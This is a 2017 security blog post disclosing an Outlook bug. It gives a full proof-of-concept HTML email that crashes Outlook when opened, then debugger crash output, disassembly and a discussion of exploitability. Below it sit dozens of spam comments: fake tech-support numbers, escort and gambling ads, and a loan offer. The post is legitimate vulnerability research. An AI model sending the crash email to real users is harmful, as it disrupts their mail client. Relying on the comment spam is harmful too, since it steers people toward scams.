2017年3月27日星期一

An Interesting Outlook Bug

Last week I reported an interesting bug in Outlook to Microsoft - it's an HTML email, and when you send this email to someone, when he/she *just read* the email, Outlook will crash (similar dangerous level as my #BadWinmail bug if this one is exploitable). As today MSRC told me that they think it's a non-exploitable bug and it seems that they are not going to fix it in near future, I'm releasing the details in this quick write-up, and hopefully, for an "old pedant" style open discussion about the exploitability as I still have some doubts.:-)

The PoC could be as simple as the following, or you may download the .eml file here.

Content-Type: multipart/alternative; boundary="===============111111111111==
MIME-Version: 1.0
Subject: title
From: aa@msft.com
To: bb@msft.com

--===============111111111111==
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit

plain text area
--===============111111111111==
Content-Type: text/html; charset="us-ascii"
MIME-Version: 1.0

<html>
<head>
<style>body{display:none !important;}</style>
</head>
<body>    
<div>
e
</div>
<div>
<table>
<tr height="1%">
</tr>
</table>
</div>
<div>
e
</div>
</body>
</html>

--===============111111111111==--


If you do some tests based on the PoC you will quickly figure out that the CSS code "<style>body{display:none !important;}</style>" is something important here. For example, if we remove this line, Outlook won't crash. This also suggests that the bug is related to some "CSS rendering" code in Outlook.


The Crash

The following crash should be observed on Office 2010 14.0.7177.5000, full updated as of March 21, 2017. In fact, I believe it affects all Outlook versions.

(384.400): Access violation - code c0000005 (!!! second chance !!!)
eax=0020f580 ebx=0ea72288 ecx=00000000 edx=00000000 esi=191cdfd0 edi=5d064400
eip=5c5e17e5 esp=0020f56c ebp=0020f754 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
wwlib!DllGetLCID+0x25b35f:
5c5e17e5 f781e402000000040000 test dword ptr [ecx+2E4h],400h ds:0023:000002e4=????????
0:000> k
ChildEBP RetAddr
WARNING: Stack unwind information not available. Following frames may be wrong.
0020f754 5c5a2b93 wwlib!DllGetLCID+0x25b35f
0020f774 5c1d80de wwlib!DllGetLCID+0x21c70d
0020f794 5c1d801b wwlib!GetAllocCounters+0x51906
0020f818 5c1d5c33 wwlib!GetAllocCounters+0x51843
0020f82c 5c26d803 wwlib!GetAllocCounters+0x4f45b
0020f83c 2f63f1b6 wwlib!GetAllocCounters+0xe702b
0020f880 2f63f06b outlook!GetMsoInst+0x32e2
0020f8a8 2ffb9d6b outlook!GetMsoInst+0x3197
0020f938 76b0ef1c outlook!PushSavedKeyToCicero+0x291d8
0020f944 7733367a kernel32!BaseThreadInitThunk+0xe
0020f984 7733364d ntdll!__RtlUserThreadStart+0x70
0020f99c 00000000 ntdll!_RtlUserThreadStart+0x1b

It crashes at the following address:

.text:31B417D2 loc_31B417D2: ; CODE XREF: sub_31714D18+42CB1Ej
.text:31B417D2 lea eax, [ebp+var_1DC]
.text:31B417D8 push eax
.text:31B417D9 push [ebp+var_4]
.text:31B417DC push ebx
.text:31B417DD call sub_3177CE19                          ;memory data at eax will be updated
.text:31B417E2 mov ecx, [eax+48h]                           ;read the pointer at offset 0x48
.text:31B417E5 test dword ptr [ecx+2E4h], 400h      ;crash


Since the data pointed by EAX (@31B417E2) will be updated in function "sub_3177CE19", I did some debugging in that function, and it seems that:
  1. There seems to be a custom heap allocator, as I've seen heap block headers, and links.
  2. The "sub_3177CE19" does the job locating the data based on the 1st param (a pointer) and 2nd param (always be 0), and the data will be copied to the heap block pointed by the 3nd param.
  3. According to my tests, the copied bytes are always 0x00, so that's why it seems to be a null pointer dereference bug.


Discussions

If security is that clear, there's no security research.:-) Due to the complexity of Office code and Microsoft keeps refusing to release Office symbols (I've said about this 1 million times), it's really hard to be that %100 sure from outside..

First point I'd put is that it's really hard to debug the data flow without symbols, if you look at the related code you will find that this isn't that firmly NULL pointer - instead the 0x00 bytes are copied from another pointer and that related to some internal structures. The 2nd is that when I tested it in a live env (email server + Outlook env), I've observed some different things. If I remember it correctly it's on an Outlook 2016 (32bit) + Windows 10 (64bit) env, when I receive/read such email, Outlook sometimes won't crash immediately, instead, it will crash at another different address when the user performs future actions on Outlook. I don't remember the details regarding the "live test", but it does increase my doubts..

To say the least, crashing someone's Outlook *remotely* is still a bad thing, right? Think about it.. someone is working on Outlook but Outlook crashes when he/she is reading the coming email..

Feel free to reach me about your thoughts.:-)

Thanks,
Haifei







73 条评论:


  1. Nice article written by author. If you have any problem regarding outlook you can contact us. We are leading third-party technical support services provider that gives the best support to the people who use technical devices like printers, antivirus software programs, and routers. We give the services through the well trained, skilled, experienced technicians who are certified by the best and well-known technology companies.

    回复删除
    回复
    1. Thanks for your thoughts. It was helpful cause now i know some more about this interesting outlook bug. I think you shoud post this information on Instagram where a large amount of users could see it and buy instagram followers to quickly boost their number .

      删除
    2. Haifei'S Random Thoughts: An Interesting Outlook Bug >>>>> Download Now

      >>>>> Download Full

      Haifei'S Random Thoughts: An Interesting Outlook Bug >>>>> Download LINK

      >>>>> Download Now

      Haifei'S Random Thoughts: An Interesting Outlook Bug >>>>> Download Full

      >>>>> Download LINK o7

      删除
  2. Thanks making this available here in front of us. We provide matchless technical support for all queries related to Asus Router Customer Support

    回复删除
  3. Thanks for sharing this informative post with us, keep updating us.
    Cisco technical support

    回复删除

  4. if you have any problem related to the d-link router then they can contact us.
    d-link router customer service

    回复删除
  5. many people are facing problen in their internet explorer they people can contact us we are here to provide the complete solution about the asusu router support.
    internet explorer customer support

    回复删除

  6. Hi Gregory Beyrer
    Thanks for written nice informatics blog. i am really fan of your writing. i just write on article on outlook topic How to Create a Contact Group (Distribution List) in Outlooki Hope you will like it.

    回复删除
  7. Nice to see this blog, because I really need this type of informative blog about Outlook. I’m mostly thankful to for sharing this helpful blog. For any kind of customer support services call 0800-090-3220 or visit Outlook Support Number UK

    回复删除




  8. Many people frequently visit Lahore to attend meetings and conferences. You can easily feel boredom and stressed during this. To avoid all this tension and doldrums you can take Escorts in Lahore at an affordable price. We do all arrangements for you and provide you the best companion on which you can rely and trust. You can go on a date, candlelight dinner or at your favorite place with her. Our Lahore Escorts are flexible and can stay with you the whole night. All our call girls are sexy, blonde, educated and provide best call girl service in Lahore.

    回复删除
  9. It was very helpful to me. keep posting amazing stuffs. You can try Outlook email extractor tool for extracting email ids from outlook. Thanks

    回复删除
  10. This article is very nice and informative, Thanks for Sharing such nice article. its explain lot of technique and Features extract email addresses from outlook

    回复删除
  11. Thanks for share with us, Nice information about Outlook email. if any user getting Outlook issues for technical related then just contact Outlook Customer Support Number.

    回复删除
  12. Want to deal with the price manipulation issues for Binance? What are you looking for? Just dial Binance support number from your phone and get in touch with the professionals immediately. The experts will carefully examine your issue so that they can finalize the result-driven solutions immediately to the user so that issue get Binance Support Number resolved instantly. Lose the burden of queries by take time accessible solutions. They are approachable every time for the assistance so you can try their services as per your desire

    回复删除
  13. Are you facing the issue while registration of Blockchain issue? Verification process is important as you get the access of various facilities. To get your verification done in one go, you can dial Blockchain support number and get in touch with the experts immediately. The experts immediately frame solutions and Blockchain Support NUmber methods on fingertips. Sometimes they also offer assistance to the users in stepwise manner for better understanding. So, contact them for eradicating the errors completely.

    回复删除
  14. Are you facing the issue while registration of Gemini issue? Verification process is important as you get the access of various facilities. To get your verification done in one go, you can dial Gemini support number and get in touch with the experts immediately. The Gemini Support Number experts immediately frame solutions and methods on fingertips. Sometimes they also offer assistance to the users in stepwise manner for better understanding. So, contact them for eradicating the errors completely.

    回复删除
  15. This is realy a Nice blog post read on of my blogs It is really helpful article please read it too my blog outlook keeps crashing problem. you can visits our websites or toll free no +1-866-558-4555. solve your problem fastly.

    回复删除
  16. If you are facing problem for Sbcglobal Password Reset from chrome then visits our website or call us our toll free number +1(866)213-3111
    For more information visit us: http://www.itbalm.com/blog/sbcglobal-password-reset/

    回复删除
  17. I really appreciate you knowledge if you are need any technical help.Information and knowledge with us so contact us and click those links
    SBCGlobalservices
    Contact us: +1(866)379-1999

    回复删除
  18. If you are facing problem for Amazon Kindle App Not Working from chrome then visits our website or call us our toll free number +1(866)379-1999

    回复删除
  19. Thanks for sharning information .....
    read more blog Visit us.
    Amazon Alexa not working
    Contact us: +1(866)213-3111

    回复删除
  20. 此评论已被作者删除。

    回复删除
  21. If you are facing problem for Roku error code 003 from chrome then visits our website or call us our toll free number +1(866)379-1999

    回复删除
  22. I am impressed with your article, please keep it on. Many foremost magazines have released his blogs on the websites respectively. Yahoo Mail not responding I love to write about different-different issues.

    回复删除
  23. If you are facing problem for Facebook notifications not working from chrome then visits our website or call us our toll free number +1(866)379-1999

    回复删除
  24. My best opinion will be that you should use Gmail or iCloud. I am also a blogger and I have written something on how to change Apple ID password. Please, Go check on my blog and give me review about this.

    回复删除
  25. I really appreciate you knowledge if you are need any technical help.Information and knowledge with us so contact us and click those links
    Combine video on youtube
    Contact us: +1(866)235-4333

    回复删除
  26. Gmail has, since its users ongoing using, been achieved a pinnacle in offering excellent service with several user-friendly features. However, some of its users are having the issue of Gmail not receiving emails iphone into their inbox. If you want to eliminate the issue, reach professionals to get rid of all sorts of issues.

    回复删除
  27. Yahoo Temporary Error 19: How to Troubleshoot It?
    Troubleshooting Yahoo temporary errors can easily be done with just a few fixing techniques. Yet, many users are failed to apply some sort of basic method to fix Yahoo temporary error 19 on their own. If you are failed to fix the error issue, you must contact our Yahoo team straight away.

    回复删除
  28. How Do I Troubleshoot Yahoo Mail Not Receiving Emails Facebook?
    Every user would admire the use of Yahoo mail for emailing service. Recently, some users are complaining about the issue of yahoo not receiving emails from Facebook. In case, you are encountering such an issue and failed to troubleshoot it on your own, don’t worry, our executives would help you out from this.

    回复删除
  29. Gmail Temporary Error Code 6: How to Troubleshoot It?
    Gmail errors are predominantly temporary and easily get away from them after a while. However, when the error is due to technical glitches, then for users it is trickier to fix the error code. One such error is Gmail temporary error numeric code 6. If you are getting such an error code while trying to access your email account, get in touch with our executive member straight away.

    回复删除
  30. How to Troubleshoot My Gmail Not Receiving Emails?
    Gmail is best known for its quick sending and receiving emails, yet in many instances, users find the issue of their Gmail not receiving emails 2020 anymore. If you are having such an issue in your email account too, it is suggestible to get connected with our team and resolve the issue in a quickest manner.

    回复删除
  31. If you want to know how to setup Netgear Wi-Fi router, you need to consider some simple points to remember that you are choosing the correct process for your router; you can use the Nighthawk app to get help in the process and to choose the settings of your router. You may also need to configure your router in a correct way.

    回复删除
  32. How to Troubleshoot AOL Mail Not Working Properly?
    AOL mail is a well-known email client, offers a safe and delightful email experience to its users. But when it comes to accessibility, the webmail works exceptionally well. If you are facing your AOL mail not working on the browser you use, you must get in touch with our AOL service executive straight away.

    回复删除
  33. Contact MS Office setup with MS Office setup Assistance Experts If you want to know, how to Improve Unsaved MS Office Data? Dial Office.com/setup and update your MS Office setup to use all functions. https://office-setup.us/

    回复删除
  34. 此评论已被作者删除。

    回复删除
  35. 此评论已被作者删除。

    回复删除
  36. 此评论已被作者删除。

    回复删除
  37. Good. I am really impressed with your writing talents and also with the layout on your weblog. Appreciate, Is this a paid subject matter or did you customize it yourself? Either way keep up the nice quality writing, it is rare to peer a nice weblog like this one nowadays. Thank you, check also virtual edge and How to Set Up A Virtual Recruiting Event

    回复删除
  38. Sawda Capital Finance is a reputed and licensed moneylender, offering loans at low interest rates. The company is registered with the ministry of law. Our mission is to help people who are in need of cash by lending them money. We do not need any credit score, collaterals and deposits to process your loan request.
    Some of the services provided by the company are:
    1. Personal Loans
    2. Business Loans
    3. Payday Loans
    4. Debt Consolidation Loans

    Apply for a loan today.

    Email: sawda.finance@gmail.com
    Phone: +12139927693
    WhatsApp: +12139927693

    回复删除
  39. Excellent post! Your post is very useful and I felt quite interesting reading it. Expecting more post like this. Thanks for posting such a good post. laptop service in home. To service your laptop with offer prices, Please visit : Laptop service center in Navalur

    回复删除
  40. At Neopaws, you will find the best Dog shoes for this summer to protect their paws from rough flooring while you enjoy them wandering along. Our products are built with highest industry standard with exclusive quality for a long term effectiveness.

    回复删除
  41. This article is out of the roof. Wow! Wonderful. Great Post!
    https://www.aarinkaur.com/
    https://www.aarinkaur.com/Contact-Mumbai-Escorts-Aarin.html
    https://www.aarinkaur.com/Mumbai-Escorts-Rate-Card.html
    https://www.aarinkaur.com/Mumbai-Escorts-Location.html
    https://www.aarinkaur.com/Mumbai-Escorts-Location.html

    回复删除
  42. Neoprene leg wraps for dogs

    Get top products for your loved pets with neoprene leg wraps for dogs by NeoPaws. We are one of the best manufacturers for dog accessories with long list of products to ease your burden in every aspect.

    回复删除
  43. Do you want to make video about different bugs and publish it on youtube? From here https://soclikes.com/buy-youtube-subscribers you can get youtube subscribers for your channel.

    回复删除
  44. Gmail settings are out of date error in windows 10 mail is very common. Generally this error appears on the computer or computer.

    回复删除
  45. Yahoo Mail is one of the leading email platforms with over 225 million active users. Over the time, use of Yahoo Mail has significantly increased on smart devices. That said, iPhones are among those devices which when installed with the Yahoo Mail app, can fulfill your emailing requirements on the go.

    how to sign in yahoo mail without verification code
    Yahoo Mail not receiving emails 2021
    yahoo mail for android problems
    yahoo mail not working on chrome
    yahoo mail delivery error 554

    回复删除
  46. This is frequently an awesome post. this educational article give genuinely best quality information. 온라인경마

    回复删除
  47. Very detailed note and we appreciate your writing skill. 바둑이사이트

    回复删除
  48. I feel something good here. Your skill is great. 온라인카지노

    回复删除
  49. Great job. Thank you so much for sharing your wonderful site! Kindly visit my website 바카라사이트

    回复删除
  50. As the most visited country in the world, India is a hub of activity whether or not you’re journeying for enterprise or
    pleasure Gwalior is the primary prevent for maximum people. Once you revel in Night Life together along with your
    Independent Dating Girls in Gwalior you’ll by no means be capable of move again to the vintage membership scene.

    E*scorts Service at Genuine Price in Gwalior
    Available in all Hotels in Gwalior
    Dating Girls in Sada, Gwalior
    Uzbek & Kazak E*scorts in Gwalior
    Models & High Profile E*scorts in Gwalior
    Thai & Negro E*scorts in Gwalior
    Afghani & Irani E*scorts in Gwalior
    Low price E*scorts Booking in Gwalior
    Foreigner E*scorts Booking in Gwalior
    Charges & real Photographs in Gwalior

    回复删除
  51. I was looking for another article by chance and found your article오공슬롯 I am writing on this topic, so I think it will help a lot. I leave my blog address below. Please visit once.


    回复删除
  52. Awesome post. I’m a regular visitor of your web site and appreciate you taking the time to maintain the nice site. I also write blogs my last blog is QuickBooks Enterprise Error 1723.

    回复删除
  53. housekeeper hourly rate? the hourly rate for a housekeeper can range anywhere from $10 to $25 an hour. It is important to research the average rates in your area before hiring a housekeeper to ensure you are getting a fair price. Additionally, be sure to ask the housekeeper about their experience, what services they offer, and whether they have any references. By following these tips, you can find the perfect housekeeper for your home and budget.

    回复删除
  54. How To Track Mileage in QuickBooks Online The IRS requires awfully specific regulations for tracking mileage. Therefore, when the time comes to complete taxes, it can be difficult to find the needed information to properly record mileage.

    回复删除
  55. Haifei'S Random Thoughts: An Interesting Outlook Bug >>>>> Download Now

    >>>>> Download Full

    Haifei'S Random Thoughts: An Interesting Outlook Bug >>>>> Download LINK

    >>>>> Download Now

    Haifei'S Random Thoughts: An Interesting Outlook Bug >>>>> Download Full

    >>>>> Download LINK ai

    回复删除
  56. Keep up the good work; I read few posts on this website, including I consider that your blog is fascinating and has sets of the fantastic piece of information. Thanks for your valuable efforts. AccountXpert

    回复删除
  57. Hi, I do think this is an excellent web site. I stumbledupon it . I may return once again since i have book-marked it. Here i am sharing some wesbites of quickbooks hope u like my website info. How To Print W2 in Quickbooks Desktop 2021 | QuickBooks Technical Support Number | QuickBooks Payroll Support Phone Number | Upgrade From QuickBooks Pro to Enterprise | QuickBooks Printer Not Activated Error Code 20

    回复删除
  58. Hello to every one, the contents existing at this website are genuinely awesome for people experience, well, keep up the nice work
    fellows. please visit my website also

    回复删除
  59. Managing payroll with the QuickBooks application is not a complicated task. However, if QuickBooks Error Code 40001 occurs in between, it may be the most frustrating feeling for the users. It’s OK! You can go through this blog post and follow the steps given in this to troubleshoot the error. If you want to seek professionals, call us at +1(855)-738-0359!

    回复删除